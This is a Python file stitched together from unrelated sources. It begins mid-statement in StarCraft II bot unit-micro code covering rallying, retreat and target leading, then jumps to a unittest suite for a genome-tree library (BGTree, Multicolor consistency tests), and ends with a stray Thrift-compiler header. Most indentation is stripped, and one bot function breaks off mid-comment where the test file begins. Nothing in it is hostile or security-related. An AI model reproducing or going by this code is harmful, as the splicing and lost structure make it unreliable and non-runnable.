and (x.can_attack_ground or x.can_attack_air))
if unit_obj.unit.can_attack_ground and not unit_obj.unit.can_attack_air:
#can only attack ground, so go to enemies that are near ground units.
if self.cached_enemies.not_flying.exists and fUnits:
closestFriendly = fUnits.closest_to(self.cached_enemies.not_flying.closest_to(unit_obj.unit))
elif fUnits:
closestFriendly = fUnits.closest_to(unit_obj.unit)
elif unit_obj.unit.can_attack_air and not unit_obj.unit.can_attack_ground:
# can only attack air units.
if self.cached_enemies.flying.exists and fUnits:
closestFriendly = fUnits.closest_to(self.cached_enemies.flying.closest_to(unit_obj.unit))
elif fUnits:
closestFriendly = fUnits.closest_to(unit_obj.unit)
else:
#can attack anything.
if self.cached_enemies.exists and fUnits:
closestFriendly = fUnits.closest_to(self.cached_enemies.closest_to(unit_obj.unit))
elif fUnits:
closestFriendly = fUnits.closest_to(unit_obj.unit)
if closestFriendly:
#if we are not close to it, then our priority is to get there.
if unit_obj.unit.distance_to(closestFriendly) > 10:
if unit_obj.checkNewAction('move', closestFriendly.position.x, closestFriendly.position.y):
self.combinedActions.append(unit_obj.unit.move(closestFriendly))
if unit_obj.unit.is_selected or _debug_combat:
unit_obj.last_target = Point3((closestFriendly.position3d.x, closestFriendly.position3d.y, (closestFriendly.position3d.z + 1)))
return True
return False
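#Compact restatement (assumed plain containers, not python-sc2 Units objects)
#of the branching above: choose the enemy pool the unit can actually shoot,
#then rally to the friendly nearest that pool's closest enemy.
def pick_enemy_pool(unit, ground_enemies, air_enemies):
    if unit.can_attack_ground and not unit.can_attack_air:
        return ground_enemies
    if unit.can_attack_air and not unit.can_attack_ground:
        return air_enemies
    return ground_enemies + air_enemies  #can shoot both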
def moveToFriendliesNearWarpprism(self, unit_obj):
#if we are moving and no enemies exist, then we must be searching, so return False.
if unit_obj.unit.is_moving and len(self.cached_enemies) == 0:
return False
#this version uses the enemy nearest the attack point (self.prism_pylon_pos).
closestFriendly = None
fUnits = self.units().not_structure.exclude_type([WARPPRISM,OBSERVER,PROBE]).filter(lambda x: x.can_attack_ground or x.can_attack_air)
if unit_obj.unit.can_attack_ground and not unit_obj.unit.can_attack_air:
#can only attack ground, so go to enemies that are near ground units.
if self.cached_enemies.not_flying.exists and fUnits:
closestFriendly = fUnits.closest_to(self.cached_enemies.not_flying.closest_to(self.prism_pylon_pos))
elif fUnits:
closestFriendly = fUnits.closest_to(self.prism_pylon_pos)
elif unit_obj.unit.can_attack_air and not unit_obj.unit.can_attack_ground:
# can only attack air units.
if self.cached_enemies.flying.exists and fUnits:
closestFriendly = fUnits.closest_to(self.cached_enemies.flying.closest_to(self.prism_pylon_pos))
elif fUnits:
closestFriendly = fUnits.closest_to(self.prism_pylon_pos)
else:
#can attack anything.
if self.cached_enemies.exists and fUnits:
closestFriendly = fUnits.closest_to(self.cached_enemies.closest_to(self.prism_pylon_pos))
elif fUnits:
closestFriendly = fUnits.closest_to(self.prism_pylon_pos)
if closestFriendly:
#if we are not close to it, then our priority is to get there.
if unit_obj.unit.distance_to(closestFriendly) > 10:
if unit_obj.checkNewAction('move', closestFriendly.position.x, closestFriendly.position.y):
self.combinedActions.append(unit_obj.unit.move(closestFriendly))
if unit_obj.unit.is_selected or _debug_combat:
unit_obj.last_target = Point3((closestFriendly.position3d.x, closestFriendly.position3d.y, (closestFriendly.position3d.z + 1)))
return True
return False
def getUnitEnemies(self, unit_obj, radius=25):
units = Units((), self)
if unit_obj.sendHome:
units = self.cached_enemies
else:
if self.cached_enemies.exclude_type(_exclude_list):
units = self.cached_enemies.exclude_type(_exclude_list).closer_than(radius, unit_obj.unit)
if len(units) > 0:
self.unit_engaged = True
self.moveRally = False
return units
def canEscape(self, unit_obj):
enemyThreatsClose = unit_obj.closestEnemies.filter(lambda x: x.target_in_range(unit_obj.unit)).sorted(lambda x: x.movement_speed, reverse=True)
if enemyThreatsClose.exists:
if unit_obj.unit.movement_speed < enemyThreatsClose.first.movement_speed:
return False
return True
######################
#micro utilities code#
######################
def checkHome(self, unit_obj):
#check to see if there is a friendly base near the units.
if not self.defend_only or not self.under_attack:
return False
if len(self.units(NEXUS)) > 0 and len(self.cached_enemies) > 0:
if self.units(NEXUS).closer_than(30, unit_obj.unit):
return False
else:
#check to make sure we can even attack whatever it is that is attacking.
allNexus = None
if unit_obj.unit.can_attack_air and unit_obj.unit.can_attack_ground:
allNexus = self.units(NEXUS).filter(lambda x: len(self.cached_enemies.closer_than(30, x)) > 0)
elif unit_obj.unit.can_attack_air and not unit_obj.unit.can_attack_ground:
allNexus = self.units(NEXUS).filter(lambda x: len(self.cached_enemies.flying.closer_than(30, x)) > 0)
elif not unit_obj.unit.can_attack_air and unit_obj.unit.can_attack_ground:
allNexus = self.units(NEXUS).filter(lambda x: len(self.cached_enemies.not_flying.closer_than(30, x)) > 0)
#find the closest friendly that is under attack.
#closestNexus = self.game_info.player_start_location
if allNexus:
closestNexus = allNexus.sorted(lambda x: x.distance_to(unit_obj.unit)).first
unit_obj.homeTarget = closestNexus
return True
return False
def checkSurrounded(self, unit_obj) -> bool:
#check for enemies near the unit.
if len(unit_obj.closestEnemies) > 0:
enemyThreats = unit_obj.closestEnemies.closer_than((unit_obj.unit.radius + 1), unit_obj.unit)
if len(enemyThreats) > 5:
return True
return False
def goRetreat(self, unit_obj, closestEnemy):
if unit_obj.unit.name == 'Probe':
self.worker_moved = self.time + 3
unit_obj.retreating = True
#first just do a simple move if possible.
retreatPoint = self.findSimpleRetreatPoint(unit_obj.unit, closestEnemy)
if retreatPoint:
#self.last_target = retreatPoint.position
if unit_obj.checkNewAction('move', retreatPoint[0], retreatPoint[1]):
self.combinedActions.append(unit_obj.unit.move(retreatPoint))
if unit_obj.unit.is_selected or _debug_combat:
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p3AddZ(self.turn3d(closestEnemy.position)), color=Point3((219, 136, 4)))
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p2AddZ(retreatPoint), color=Point3((0, 255, 55)))
return True
#if nothing has been found, look around for an area to retreat to.
retreatPoint = None
if not unit_obj.unit.is_flying:
retreatPoint = self.findGroundRetreatTarget(unit_obj.unit, inc_size=1, enemy_radius=10)
else:
retreatPoint = self.findAirRetreatTarget(unit_obj.unit, inc_size=1, enemy_radius=10)
if retreatPoint:
#self.last_target = retreatPoint.position
if unit_obj.checkNewAction('move', retreatPoint[0], retreatPoint[1]):
self.combinedActions.append(unit_obj.unit.move(retreatPoint))
if unit_obj.unit.is_selected or _debug_combat:
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p3AddZ(self.turn3d(closestEnemy.position)), color=Point3((216, 0, 101)))
self._client.debug_line_out(self.unitDebugPos(unit_obj.unit), self.p2AddZ(retreatPoint), color=Point3((10, 2, 234)))
return True
return False
def stayMaxRange(self, unit_obj, enemy):
#stay a minimum of 9 range from the closest enemy.
#get the distance of the enemy - our attack range and move that far back.
#dist = unit_obj.unit.distance_to(enemy) - (unit_obj.unit.radius + enemy.radius + use_range)
#move away from the target that much.
if unit_obj.unit.position != enemy.position:
#check to see if we should move away.
if unit_obj.unit.distance_to(enemy.position) < 9:
targetpoint = unit_obj.unit.position.towards(enemy.position, distance=-2)
unit_obj.last_target = Point3((targetpoint.position.x, targetpoint.position.y, (unit_obj.unit.position3d.z + 1)))
if unit_obj.checkNewAction('move', targetpoint.position[0], targetpoint.position[1]):
self.combinedActions.append(unit_obj.unit.move(targetpoint))
return
else:
if unit_obj.checkNewAction('move', unit_obj.unit.position[0], unit_obj.unit.position[1]):
self.combinedActions.append(unit_obj.unit.stop())#(unit_obj.unit.position))
return
def targetFacing(self, unit_obj, enemy) -> bool:
#return True for units that don't face a particular direction (static defense structures).
if enemy.name in ['MissileTurret','SporeCrawler','SpineCrawler', 'PhotonCannon', 'Bunker']:
return True
#find out if the unit is facing us.
faceTarget = self.towardsDirection(enemy.position, enemy.facing, 1)
if unit_obj.unit.distance_to(faceTarget) > unit_obj.unit.distance_to(enemy):
return False
return True
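#The facing test relies on a towardsDirection helper; a plausible
#implementation (an assumption, not taken from the original) projects a point
#at a given angle (radians) and distance:
import math

def towards_direction(position, angle, distance):
    return (position[0] + math.cos(angle) * distance,
            position[1] + math.sin(angle) * distance)
#If the unit is farther from that projected point than from the enemy itself,
#the enemy is facing away from the unit.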
def leadTarget(self, enemy, unit_obj):
#get the point that is enemy movement_speed in distance ahead of the enemy, if the enemy is moving.
#print ('moving', str(enemy.is_moving), enemy.position, enemy.facing, enemy.movement_speed)
#self._client.debug_text_3d(str(enemy.facing), enemy.position3d)
if self.unit_moves.get(enemy.tag):
leadTarget = self.towardsDirection(enemy.position, enemy.facing, enemy.movement_speed)
#check to see if the
# -*- coding: utf-8 -*-
from ete3 import TreeNode
from bg.edge import BGEdge
from bg.genome import BGGenome
from bg.multicolor import Multicolor
from bg.tree import BGTree
__author__ = "<NAME>"
__email__ = "aganezov(at)cs.jhu.edu"
__status__ = "production"
import unittest
class BGTreeTestCase(unittest.TestCase):
def setUp(self):
# commonly used values during the test cases
v1, v2, v3, v4, v5 = "v1", "v2", "v3", "v4", "v5"
self.v1 = v1
self.v2 = v2
self.v3 = v3
self.v4 = v4
self.v5 = v5
self.bg_v1 = BGGenome(self.v1)
self.bg_v2 = BGGenome(self.v2)
self.bg_v3 = BGGenome(self.v3)
self.bg_v4 = BGGenome(self.v4)
self.bg_v5 = BGGenome(self.v5)
def test_edge_length(self):
# every edge in a tree has a length
# if no specific length was specified on edge addition, a default value (1) is stored for this edge
tree = BGTree("(v1:5)v2;")
self.assertEqual(tree.get_distance(node1_name=self.v1, node2_name=self.v2), 5)
self.assertEqual(tree.get_distance(node1_name=self.v2, node2_name=self.v1), 5)
# edge_length lookup is available only for existing edges, thus both vertices have to be present
# and an edge between them must exist
with self.assertRaises(ValueError):
tree.get_distance(node1_name=self.v1, node2_name=self.v3)
with self.assertRaises(ValueError):
tree.get_distance(node1_name=self.v3, node2_name=self.v4)
with self.assertRaises(ValueError):
tree.get_distance(node1_name=self.v3, node2_name=self.v4)
def test_add_edge(self):
# a tree supports an operation to add a new edge (branch)
# if vertices of the specified edge were not present in the tree, they are added automatically
tree = BGTree("(v1:5)v2;")
tree.multicolors_are_up_to_date = True
tree.add_edge(node1_name=self.v1, node2_name=self.v3)
self.assertFalse(tree.multicolors_are_up_to_date)
self.assertEqual(len(list(tree.nodes())), 3)
self.assertEqual(len(list(tree.edges())), 2)
self.assertEqual(tree.get_distance(self.v1, self.v2), 5)
self.assertEqual(tree.get_distance(self.v1, self.v3), 1)
self.assertEqual(tree.get_distance(self.v2, self.v3), 6)
self.assertFalse(tree.multicolors_are_up_to_date)
def test_add_edge_explicit_edge_length(self):
# when an edge is added, one can explicitly set its length
tree = BGTree("(v1)v2;")
tree.multicolors_are_up_to_date = True
tree.add_edge(node1_name=self.v2, node2_name=self.v3, edge_length=5)
self.assertFalse(tree.multicolors_are_up_to_date)
self.assertEqual(len(list(tree.nodes())), 3)
self.assertEqual(len(list(tree.edges())), 2)
self.assertEqual(tree.get_distance(self.v1, self.v3), 6)
self.assertEqual(tree.get_distance(self.v2, self.v3), 5)
self.assertFalse(tree.multicolors_are_up_to_date)
def test_has_edge_direction(self):
tree = BGTree("((v1, v2:5)v3, v4)root;")
self.assertTrue(tree.has_edge(self.v3, self.v1))
self.assertFalse(tree.has_edge(self.v1, self.v3))
self.assertTrue(tree.has_edge(self.v3, self.v2))
self.assertFalse(tree.has_edge(self.v2, self.v3))
self.assertTrue(tree.has_edge("root", self.v3))
self.assertFalse(tree.has_edge(self.v3, "root"))
self.assertTrue(tree.has_edge("root", self.v4))
self.assertFalse(tree.has_edge(self.v4, "root"))
self.assertFalse(tree.has_edge(self.v1, self.v2))
self.assertFalse(tree.has_edge(self.v2, self.v1))
self.assertFalse(tree.has_edge(self.v3, self.v4))
self.assertFalse(tree.has_edge(self.v4, self.v3))
self.assertFalse(tree.has_edge(self.v1, self.v4))
self.assertFalse(tree.has_edge(self.v4, self.v1))
def test_has_edge_no_direction(self):
tree = BGTree("((v1, v2:5)v3, v4)root;")
self.assertTrue(tree.has_edge(self.v3, self.v1, account_for_direction=False))
self.assertTrue(tree.has_edge(self.v1, self.v3, account_for_direction=False))
self.assertTrue(tree.has_edge(self.v3, self.v2, account_for_direction=False))
self.assertTrue(tree.has_edge(self.v2, self.v3, account_for_direction=False))
self.assertTrue(tree.has_edge("root", self.v3, account_for_direction=False))
self.assertTrue(tree.has_edge(self.v3, "root", account_for_direction=False))
self.assertTrue(tree.has_edge("root", self.v4, account_for_direction=False))
self.assertTrue(tree.has_edge(self.v4, "root", account_for_direction=False))
self.assertFalse(tree.has_edge(self.v1, self.v2, account_for_direction=False))
self.assertFalse(tree.has_edge(self.v2, self.v1, account_for_direction=False))
self.assertFalse(tree.has_edge(self.v3, self.v4, account_for_direction=False))
self.assertFalse(tree.has_edge(self.v4, self.v3, account_for_direction=False))
self.assertFalse(tree.has_edge(self.v1, self.v4, account_for_direction=False))
self.assertFalse(tree.has_edge(self.v4, self.v1, account_for_direction=False))
def test_has_node(self):
# tree has an O(1) method to check if a node is present in a tree
tree = BGTree("(v1, v2)root;")
self.assertTrue(tree.has_node(self.v1))
self.assertTrue(tree.has_node(self.v2))
self.assertTrue(tree.has_node("root"))
self.assertFalse(tree.has_node(self.v4))
def test_append_tree_no_copy(self):
tree1 = BGTree("(v1, v2)root;")
tree2 = BGTree("(v4, v5)v3;")
tree1.multicolors_are_up_to_date = True
tree2.multicolors_are_up_to_date = True
tree1.append(node_name=self.v1, tree=tree2)
#####
self.assertFalse(tree1.multicolors_are_up_to_date)
self.assertEqual(len(list(tree1.nodes())), 6)
self.assertEqual(len(list(tree1.edges())), 5)
self.assertTrue(tree1.has_edge(node1_name=self.v1, node2_name=self.v3))
#####
self.assertTrue(tree2.multicolors_are_up_to_date)
self.assertEqual(len(list(tree2.nodes())), 3)
self.assertEqual(len(list(tree2.edges())), 2)
tree1.get_node_by_name("v5").name = "new_v5"
self.assertFalse(tree2.has_node("v5"))
def test_append_tree_copy(self):
tree1 = BGTree("(v1, v2)root;")
tree2 = BGTree("(v4, v5)v3;")
tree1.multicolors_are_up_to_date = True
tree2.multicolors_are_up_to_date = True
tree1.append(node_name=self.v1, tree=tree2, copy=True)
#####
self.assertFalse(tree1.multicolors_are_up_to_date)
self.assertEqual(len(list(tree1.nodes())), 6)
self.assertEqual(len(list(tree1.edges())), 5)
self.assertTrue(tree1.has_edge(node1_name=self.v1, node2_name=self.v3))
#####
self.assertTrue(tree2.multicolors_are_up_to_date)
self.assertEqual(len(list(tree2.nodes())), 3)
self.assertEqual(len(list(tree2.edges())), 2)
tree1.get_node_by_name("v5").name = "new_v5"
self.assertTrue(tree2.has_node("v5"))
def test_get_tree_consistent_multicolors(self):
# with no account for wgd, root specification is irrelevant
tree = BGTree("(((v1, v2), v3),(v4, v5));")
self.assertFalse(tree.multicolors_are_up_to_date)
tree_consistent_multicolors = tree.get_tree_consistent_multicolors()
self.assertTrue(tree.multicolors_are_up_to_date)
self.assertIsInstance(tree_consistent_multicolors, list)
self.assertEqual(tree_consistent_multicolors, tree.tree_consistent_multicolors)
self.assertFalse(tree_consistent_multicolors is tree.tree_consistent_multicolors)
for obtained_mc, stored_mc in zip(tree_consistent_multicolors, tree.tree_consistent_multicolors):
self.assertFalse(obtained_mc is stored_mc)
self.assertSetEqual({mc.hashable_representation for mc in tree_consistent_multicolors},
tree.tree_consistent_multicolors_set)
self.assertEqual(len(tree_consistent_multicolors), 16)
ref_tree_consistent_multicolors = [
Multicolor(), Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5),
Multicolor(self.bg_v1), Multicolor(self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5),
Multicolor(self.bg_v2), Multicolor(self.bg_v1, self.bg_v3, self.bg_v4, self.bg_v5),
Multicolor(self.bg_v3), Multicolor(self.bg_v1, self.bg_v2, self.bg_v4, self.bg_v5),
Multicolor(self.bg_v4), Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v5),
Multicolor(self.bg_v5), Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4),
Multicolor(self.bg_v1, self.bg_v2), Multicolor(self.bg_v3, self.bg_v4, self.bg_v5),
Multicolor(self.bg_v4, self.bg_v5), Multicolor(self.bg_v1, self.bg_v2, self.bg_v3),
]
for multicolor in ref_tree_consistent_multicolors:
self.assertIn(multicolor, tree_consistent_multicolors)
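# Illustrative aside (uses ete3 directly; not part of the BGTree API): every
# non-root branch of "(((v1, v2), v3), (v4, v5));" splits the five leaves into
# a clade and its complement, and together with the empty and full sets those
# splits are exactly the 16 tree-consistent subsets counted above.
def count_tree_consistent_subsets(newick):
    from ete3 import Tree
    t = Tree(newick)
    leaves = frozenset(t.get_leaf_names())
    splits = {frozenset(), leaves}
    for node in t.traverse():
        if not node.is_root():
            clade = frozenset(node.get_leaf_names())
            splits.add(clade)           # the subtree's leaf set...
            splits.add(leaves - clade)  # ...and its complement
    return len(splits)
# count_tree_consistent_subsets("(((v1, v2), v3), (v4, v5));") == 16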
def test_is_multicolor_tree_consistent(self):
# tests if supplied multicolor complies with tree topology
##########################################################################################
#
# empty multicolor complies with any tree
#
##########################################################################################
mc = Multicolor()
self.assertTrue(BGTree().multicolor_is_tree_consistent(mc))
##########################################################################################
#
# simple cases
#
##########################################################################################
tree = BGTree("(((v1, v2), v3),(v4, v5));")
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1)))
##########################################################################################
#
# a small v1, v2 subtree, still consistent
#
##########################################################################################
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2)))
##########################################################################################
#
# bigger v1, v2, v3 subtree, still consistent
#
##########################################################################################
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3)))
##########################################################################################
#
# v2, v3 is not a valid subtree (its complement is two subtrees, instead of one)
#
##########################################################################################
self.assertFalse(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v2, self.bg_v3)))
##########################################################################################
#
# if some genomes in the multicolor are not present in the tree, the multicolor will not be consistent with the tree
#
##########################################################################################
self.assertFalse(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, BGGenome("v6"))))
##########################################################################################
#
# other cases for a non wgd tree
#
##########################################################################################
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v5)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v4, self.bg_v5)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v3, self.bg_v4, self.bg_v5)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v5, self.bg_v4)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v3, self.bg_v4, self.bg_v5)))
self.assertFalse(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v3, self.bg_v5)))
def test_is_multicolor_tree_consistent_non_binary_tree(self):
tree = BGTree("(v1, v2, v3);")
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v2)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v3)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v2)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v1, self.bg_v3)))
self.assertTrue(tree.multicolor_is_tree_consistent(Multicolor(self.bg_v3, self.bg_v2)))
def test_is_bgedge_tree_consistent(self):
# tests if supplied bgedge has a multicolor that is consistent with tree topology
v1, v2 = "v1", "v2"
bgedge = BGEdge(vertex1=v1, vertex2=v2, multicolor=Multicolor())
##########################################################################################
#
# bgedge with an empty multicolor complies with any tree
#
##########################################################################################
mc = Multicolor()
bgedge.multicolor = mc
self.assertTrue(BGTree("(v1, v2);").bgedge_is_tree_consistent(bgedge))
##########################################################################################
#
# simple cases
#
##########################################################################################
tree = BGTree("(((v1, v2), v3),(v4, v5));")
bgedge.multicolor = Multicolor(self.bg_v1)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
##########################################################################################
#
# a small v1, v2 subtree, still consistent
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
##########################################################################################
#
# bigger v1, v2, v3 subtree, still consistent
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
##########################################################################################
#
# v2, v3 is not a valid subtree (its complement is two subtrees, instead of one)
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v2, self.bg_v3)
self.assertFalse(tree.bgedge_is_tree_consistent(bgedge))
##########################################################################################
#
# if some genomes in the multicolor are not present in the tree, the multicolor will not be consistent with the tree
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, BGGenome("v6"))
self.assertFalse(tree.bgedge_is_tree_consistent(bgedge))
##########################################################################################
#
# other cases for a non wgd tree
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v5)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v4, self.bg_v5)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v3, self.bg_v4, self.bg_v5)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v5, self.bg_v4)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v3, self.bg_v4, self.bg_v5)
self.assertTrue(tree.bgedge_is_tree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v3, self.bg_v5)
self.assertFalse(tree.bgedge_is_tree_consistent(bgedge))
def test_get_vtree_consistent_multicolors(self):
tree = BGTree("(((v1, v2), v3),(v4, v5));")
self.assertFalse(tree.multicolors_are_up_to_date)
vtree_consistent_multicolors = tree.get_vtree_consistent_multicolors()
self.assertTrue(tree.multicolors_are_up_to_date)
self.assertIsInstance(vtree_consistent_multicolors, list)
self.assertEqual(vtree_consistent_multicolors, tree.vtree_consistent_multicolors)
self.assertFalse(vtree_consistent_multicolors is tree.vtree_consistent_multicolors)
for obtained_mc, stored_mc in zip(vtree_consistent_multicolors, tree.vtree_consistent_multicolors):
self.assertFalse(obtained_mc is stored_mc)
self.assertSetEqual({mc.hashable_representation for mc in vtree_consistent_multicolors},
tree.vtree_consistent_multicolors_set)
self.assertEqual(len(vtree_consistent_multicolors), 10)
ref_vtree_consistent_multicolors = [
Multicolor(), Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5),
Multicolor(self.bg_v1),
Multicolor(self.bg_v2),
Multicolor(self.bg_v3),
Multicolor(self.bg_v4),
Multicolor(self.bg_v5),
Multicolor(self.bg_v1, self.bg_v2),
Multicolor(self.bg_v4, self.bg_v5), Multicolor(self.bg_v1, self.bg_v2, self.bg_v3),
]
for multicolor in ref_vtree_consistent_multicolors:
self.assertIn(multicolor, vtree_consistent_multicolors)
def test_is_multicolor_vtree_consistent(self):
mc = Multicolor()
self.assertTrue(BGTree().multicolor_is_vtree_consistent(mc))
tree = BGTree("(((v1, v2), v3), (v4, v5));")
self.assertTrue(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v1)))
self.assertTrue(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v1, self.bg_v2)))
self.assertTrue(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v4, self.bg_v5)))
self.assertTrue(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3)))
self.assertTrue(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)))
self.assertFalse(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v2, self.bg_v3)))
self.assertFalse(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v1, BGGenome("v6"))))
self.assertFalse(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v3, self.bg_v5)))
def test_is_multicolor_vtree_consistent_non_binary_tree(self):
tree = BGTree("(v1, v2, v3);")
self.assertTrue(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v1)))
self.assertTrue(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v2)))
self.assertTrue(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v3)))
self.assertTrue(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v1, self.bg_v2, self.bg_v3)))
self.assertFalse(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v1, self.bg_v2)))
self.assertFalse(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v1, self.bg_v3)))
self.assertFalse(tree.multicolor_is_vtree_consistent(Multicolor(self.bg_v3, self.bg_v2)))
def test_is_bgedge_vtree_consistent(self):
v1, v2 = "v1", "v2"
bgedge = BGEdge(vertex1=v1, vertex2=v2, multicolor=Multicolor())
##########################################################################################
#
# bgedge with an empty multicolor complies with any tree
#
##########################################################################################
mc = Multicolor()
bgedge.multicolor = mc
self.assertTrue(BGTree("(v1, v2);").bgedge_is_vtree_consistent(bgedge))
##########################################################################################
#
# simple cases
#
##########################################################################################
tree = BGTree("(((v1, v2), v3),(v4, v5));")
bgedge.multicolor = Multicolor(self.bg_v1)
self.assertTrue(tree.bgedge_is_vtree_consistent(bgedge))
##########################################################################################
#
# a small v1, v2 subtree, still consistent
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2)
self.assertTrue(tree.bgedge_is_vtree_consistent(bgedge))
##########################################################################################
#
# bigger v1, v2, v3 subtree, still consistent
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3)
self.assertTrue(tree.bgedge_is_vtree_consistent(bgedge))
##########################################################################################
#
# v2, v3 is not a valid subtree (its complement is two subtrees, instead of one)
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v2, self.bg_v3)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
##########################################################################################
#
# if some genomes in the multicolor are not present in the tree, the multicolor will not be consistent with the tree
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, BGGenome("v6"))
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
##########################################################################################
#
# other cases for a non wgd tree
#
##########################################################################################
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v5)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v4, self.bg_v5)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v3, self.bg_v4, self.bg_v5)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v1, self.bg_v2, self.bg_v3, self.bg_v4, self.bg_v5)
self.assertTrue(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v5, self.bg_v4)
self.assertTrue(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v3, self.bg_v4, self.bg_v5)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
bgedge.multicolor = Multicolor(self.bg_v3, self.bg_v5)
self.assertFalse(tree.bgedge_is_vtree_consistent(bgedge))
def test_get_tree_consistent_multicolors_with_non_default_leaf_wrapper(self):
tree = BGTree("(v1, v2)root;", leaf_wrapper=lambda name: name)
tree_consistent_multicolors = tree.get_tree_consistent_multicolors()
ref_multicolors = [Multicolor(self.v1), Multicolor(self.v2), Multicolor(), Multicolor(self.v1, self.v2)]
self.assertEqual(len(tree_consistent_multicolors), 4)
for multicolor in ref_multicolors:
    self.assertIn(multicolor, tree_consistent_multicolors)
#
# Autogenerated by Thrift Compiler (0.9.1)
#
